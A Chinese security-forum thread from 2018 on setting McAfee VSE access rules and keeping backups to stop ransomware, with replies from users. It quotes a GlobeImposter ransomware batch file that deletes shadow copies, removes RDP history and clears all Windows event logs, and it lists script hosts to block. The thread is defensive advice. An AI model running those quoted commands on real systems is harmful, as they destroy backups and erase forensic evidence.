查看: 3982|回复: 13
收起左侧

[其他相关] 简论使用麦咖啡防御勒索

[复制链接]
柯林
发表于 2018-10-6 10:21:42 | 显示全部楼层 |阅读模式
本帖最后由 柯林 于 2018-10-12 18:02 编辑

这年头最“凶猛”的毒,大概要数勒索,其它都一般(盗号木马啥的注意点别让病毒进来就ok,至于MBR病毒换用GPT分区就没了)

勒索病毒最常见的传播方式是电子邮件附件。以VSE为例,假设你设置的电邮附件保存目录在我的文档里,假设附件里带毒,如果你就地解压,假设你设置了规则“禁止生成新的exe文件”,那么病毒是无法解压出来的,也就谈不上运行后产生危害;假设病毒被解压出来了,如果你设置了“禁止执行我的文档里的文件“这么一条规则,你不知道它是病毒,点击后,它依然是无法运行的;假设你不知道附件带毒,直接点进压缩包里查看,双击压缩包内的文件,病毒将被解压工具释放到临时目录(一般是C:\Users\XXX\AppData\Local\Temp)里,假设它是exe格式,将被”禁止生成新的exe文件”这条规则拦截,无法释放出来,如果是scr等格式,假设你设置了“禁止执行用户Temp里的文件",虽然病毒被释放到了临时目录,依旧无法发作。

假设病毒来自U盘,只要设置一条”禁止执行U盘上的文件“,那么病毒根本就运行不了,也释放不出恶意程序,起不了作用;假设没有这么一条规则,那么就由”禁止生成新的exe文件”和“禁止执行用户Temp里的文件"这两条来加以拦截(如果病毒不是exe格式,也不是释放到Temp里执行,那就突破了防线)

对于重要资料,建议设置第二道防线——把重要资料归结在特定目录里,设置规则进行保护(除了授权程序,拒绝其他程序访问修改)。

以上所谈,都是建立在麦咖啡的月神和本地监控没有扫描出病毒的情况下,依据规则进行防堵,如果杀毒已经识别为病毒,直接被干掉,也就轮不到规则派上用场。
-----------------------------------------------------------------
小梳理:勒索病毒危害过程大致是这样的——利用网络(电邮为主)或U盘进行传播,进入计算机后,病毒运行,释放加密程序或下载加密程序到特定位置(通常是C:\Users\XXX\AppData\Local\Temp,也包括”我的文档“及C:\Users\XXX\AppData\Roaming等)运行,全盘搜索指定格式执行加密,完事后弹出勒索窗口,调用CMD命令删除病毒自身,甚至释放一个bat文件删除文件备份等(参看某勒索病毒的示例:

”解密bat文件后释放到临时目录下,并加载运行
解密出来的bat文件内容如下

@echo off
vssadmin.exe Delete Shadows /All /Quiet
reg delete"HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default"/va /f
reg delete"HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"/f
reg add"HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp
for /F "tokens=*" %1 in ('wevtutil.exe el')DO wevtutil.exe cl "%1"

Bat会删除远程桌面连接信息文件default.rdp,并通过wevtutil.execl命令删除日志信息“

——引文来自《GlobeImposter勒索病毒技术分析报告》原文地址http://www.freebuf.com/articles/system/163792.html
------------------------------------------------------------------------
对于主打FD且功能可靠的麦咖啡来说,防御勒索病毒其实很简单。由以上信息可知,大致是三招:

第一招:入口防御,禁止scr文件与exe文件生成;禁运Temp、我的文档、U盘等关键位置,让病毒进不了计算机或无法运行作怪
第二招:二道防御,给数据安全再加一把锁——把重要文件归聚起来实行保护,禁止非授权程序破坏
第三招:补漏措施,打上系统补丁,关闭危险服务与端口,VSE做规则禁止执行vssadmin.exe以防止文件备份被删除等

ps:真正的王道,当然是备份(数据无价的请多买两块移动磁盘勤于备份;一般人至少用个大容量U盘吧;重要的影像资料建议刻录光盘)
-------------------------------------------------------------------------
如果不小心中了勒索,可以尝试进Pe去用数据恢复软件如DiskGenius进行恢复看看,如果不行,请网上查找方法
万一没辙,可以尝试联系专业数据恢复公司(网上搜索”勒索病毒“就有)
如果专业公司也没法,那就只能联系病毒作者尝试付费解密,假设数据比较重要


ps:如果你有备份,那就无视勒索,即使整个硬盘资料全毁了,大不了重做系统就是。






评分

参与人数 3人气 +3 收起 理由
ly910326 + 1 版区有你更精彩: )
jone_jys + 1 版区有你更精彩: )
l10x + 1 很给力!

查看全部评分

静影沉璧
发表于 2018-10-6 10:33:34 | 显示全部楼层
感谢分享,前排支持
天道酬善
发表于 2018-10-6 12:15:40 | 显示全部楼层
今年公司我的电脑中了勒索,还好大部分资料有网络备份。
柯林
 楼主| 发表于 2018-10-6 12:24:02 | 显示全部楼层
天道酬善 发表于 2018-10-6 12:15
今年公司我的电脑中了勒索,还好大部分资料有网络备份。

按实情来看,公司,学校,医院,加油站等公共单位容易中招;据说很多服务器中招是管理员太懒---为方便自己记忆登录密码设置弱口令+没有设定登录次数锁定---导致黑客攻陷,进去关闭防毒软件,手动植入病毒。

其实稍微大一点的公司(使用电脑十台以上),应该设置一个专门备份员,负责每天的数据备份--备份数据存放在一台永不联网的运行非windows系统的专用数据备份机上……这样比较科学。
jone_jys
头像被屏蔽
发表于 2018-10-6 12:27:59 | 显示全部楼层
对于经常安装卸载软件的,怕麻烦就直接上“第二招”补充规则,简单又高效。可以按文件夹分类保护,亦可按扩展名分类保护。只要没有乱排除,被保护的对象,可谓是“铜墙铁壁”

VSE很赞!
kfunname
发表于 2018-10-6 13:05:21 | 显示全部楼层
真棒,防勒索基本就这个口,来源封锁,重要东西再加强保护,任它病毒多么厉害,运行不了也徒然,其实不仅防勒索,可以扩大到防未知威胁了。
wheyu。。。
发表于 2018-10-6 19:28:31 | 显示全部楼层
勒索没遇到过,不过看看这个还是能增加些认知的
ly910326
发表于 2018-10-7 15:15:03 | 显示全部楼层
我这里通过私云存储来实现文件的转储,即便被勒索,直接一键恢复或者直接客服换硬盘解决。
柯林
 楼主| 发表于 2018-10-7 18:17:40 | 显示全部楼层
ly910326 发表于 2018-10-7 15:15
我这里通过私云存储来实现文件的转储,即便被勒索,直接一键恢复或者直接客服换硬盘解决。

居然私云
柯林
 楼主| 发表于 2018-10-11 15:43:05 | 显示全部楼层
本帖最后由 柯林 于 2018-10-11 15:45 编辑

补一句,如果不怕使用上的麻烦,可以小增强:

1、防御加驱病毒。对于来自网络的病毒,假设不知为毒,已经下载到本地,可以写条规则
禁止?:\Users\**访问注册表services项目,无论病毒是下载到桌面、文档还是用户Temp目录,都是加不了驱动的(这一条通常不影响程序的安装、卸载与运行)

2、防止系统帮倒忙,如果某些病毒或恶意程序在Users路径下,可以写一条
禁止cmd.exe,wscript.exe,powershell.exe,svchost.exe,rundll32.exe等高危玩意执行*\Users\** (这一条可能会影响某些程序的安装卸载或运行)
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-23 03:04 , Processed in 0.144752 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表